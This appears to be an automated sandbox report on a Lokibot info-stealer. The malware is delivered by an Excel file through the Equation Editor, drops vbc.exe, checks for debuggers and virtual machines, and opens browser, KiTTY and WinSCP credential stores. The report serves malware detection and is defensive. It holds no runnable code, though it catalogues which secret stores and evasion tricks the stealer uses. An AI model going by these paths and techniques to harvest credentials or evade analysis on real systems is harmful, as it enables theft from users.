Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A645B push esi; ret 4_2_004A645D
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A685C push edi; ret 4_2_004A685E
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A7083 push esi; ret 4_2_004A7085
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A7484 push edi; ret 4_2_004A7486
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A3495 push ecx; ret 4_2_004A34A8
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A5231 push edi; ret 4_2_004A5232
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A6767 push esi; ret 4_2_004A6769
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A73DE push edi; ret 4_2_004A73E0
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A738F push esi; ret 4_2_004A7391
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A67B6 push edi; ret 4_2_004A67B8

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BR42M2GZ\regasm[1].exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Document contains OLE streams with high entropy indicating encrypted embedded contentShow sources
Source: 20200413_140639.xlsxStream path 'EncryptedPackage' entropy: 7.99967464959 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_013A278E rdtsc 4_2_013A278E
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 2192Thread sleep time: -1200000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exe TID: 2308Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\mspaint.exe TID: 2452Thread sleep time: -14520000s >= -30000sJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004AB84C __getdrive,FindFirstFileExW,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,GetLastError,FindClose,GetLastError,FindClose,4_2_004AB84C
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: vbc.exe, 00000004.00000003.1222749766.02C40000.00000004.00000001.sdmpBinary or memory string: AAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5OJSV+VElAAAAAL6Y/T20i5t7AAAAAPhq8E2n1pHmAAAAACUAcwBcACUAcwAuACUAcwAAAAAAAAAAAAAAAAAAAAAADQoNCmFQTGliIHYxLjAxICAtICB0aGUgc21hbGxlciB0aGUgYmV0dGVyIDopDQpDb3B5cmlnaHQgKGMpIDE5OTgtMjAwOSBieSBKb2VyZ2VuIElic2VuLCBBbGwgUmlnaHRzIFJlc2VydmVkLg0KDQpNb3JlIGluZm9ybWF0aW9uOiBodHRwOi8vd3d3Lmlic2Vuc29mdHdhcmUuY29tLw0KDQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9t05rwSUtBPbWVOzdomItb4ULVy0KCBFED2jkSHpTjgAAAACWMAd3LGEO7rpRCZkZxG0Hj/RqcDWlY+mjlWSeMojbDqS43Hke6dXgiNnSlytMtgm9fLF+By2455Edv5BkELcd8iCwakhxufPeQb6EfdTaGuvk3W1RtdT0x4XTg1aYbBPAqGtkevli/ezJZYpPXAEU2WwGY2M9D/r1DQiNyCBuO14QaUzkQWDVcnFnotHkAzxH1ARL/YUN0mu1CqX6qLU1bJiyQtbJu9tA+bys42zYMnVc30XPDdbcWT3Rq6ww2SY6AN5RgFHXyBZh0L+19LQhI8SzVpmVus8Ppb24nrgCKAiIBV+y2QzGJOkLsYAP32

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_013A278E rdtsc 4_2_013A278E
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A4B55 IsDebuggerPresent,4_2_004A4B55
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004B033C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,4_2_004B033C
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004B033C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,4_2_004B033C
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]4_2_0040317B
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_013A202E mov eax, dword ptr fs:[00000030h]4_2_013A202E
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,4_2_00402B7C
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe' Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: vbc.exe, 00000004.00000002.1388407355.00650000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.1388407355.00650000.00000002.00000001.sdmpBinary or memory string: Progman
Source: vbc.exe, 00000004.00000002.1388407355.00650000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,4_2_004B244F
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_004B2817
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,4_2_004B0CD2
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,4_2_004A38ED
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,IsValidCodePage,__itow_s,__invoke_watson,GetLocaleInfoW,4_2_004B2104
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: EnumSystemLocalesW,4_2_004A31E5
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: __crtGetLocaleInfoA_stat,4_2_004B05F6
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: GetLocaleInfoW,4_2_004B2642
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: GetLocaleInfoW,4_2_004A3222
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_004B12D6
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_004B234F
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004B276A
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: EnumSystemLocalesW,4_2_004B230F
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_004B23CC
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A4CEB cpuid 4_2_004A4CEB
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.db VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A962E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_004A962E
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004AF9A3 __getenv_helper_nolock,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_004AF9A3
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: 00000004.00000002.1388284564.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2328, type: MEMORY
Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Martin PrikrylJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
